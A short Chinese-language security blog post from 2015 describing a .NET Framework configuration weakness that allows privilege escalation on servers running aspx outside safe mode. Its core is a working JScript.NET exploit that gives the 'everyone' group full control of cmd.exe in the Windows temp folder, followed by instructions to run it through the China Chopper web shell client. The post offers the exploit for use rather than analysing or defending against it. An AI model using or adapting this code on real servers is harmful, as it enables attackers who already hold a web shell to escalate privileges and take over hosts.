MENU

微软某开发框架多个版本存在问题可用来提权

July 1, 2015 • Security

前言

微软.NET框架配置不当,可利用技巧来提权:http://www.wooyun.org/bugs/wooyun-2015-0104148

影响版本

  • Microsoft .NET Framework 2.0
  • Microsoft .NET Framework 3.5
  • Microsoft .NET Framework 3.5.1
  • Microsoft .NET Framework 4
  • Microsoft .NET Framework 4.5
  • Microsoft .NET Framework 4.5.1

利用条件

  1. 需要支持aspx并且高于Microsoft .NET Framework 1.14版本
  2. 安全模式除外(现在还没有能突破.net安全模式的方法)

PoC

EXP如下:

try
{

var strPath:String = "c:\\windows\\temp\\cmd.exe", strUser:String = "everyone";
var dirinfo:System.IO.DirectoryInfo = new System.IO.DirectoryInfo(strPath);

var dirsecurity:System.Security.AccessControl.DirectorySecurity = dirinfo.GetAccessControl();

dirsecurity.AddAccessRule(new System.Security.AccessControl.FileSystemAccessRule(strUser,
    System.Security.AccessControl.FileSystemRights.FullControl,
    System.Security.AccessControl.AccessControlType.Allow));

dirinfo.SetAccessControl(dirsecurity);
Response.Write(strPath+"\t权限添加成功!");

}catch(x){Response.Write(x.Message);}

只要支持aspx不是安全模式就能执行命令,保存为x.ccc文件使用菜刀自写脚本运行即可!

Tags: 提权, .net
Archives QR Code
QR Code for this page
Tipping QR Code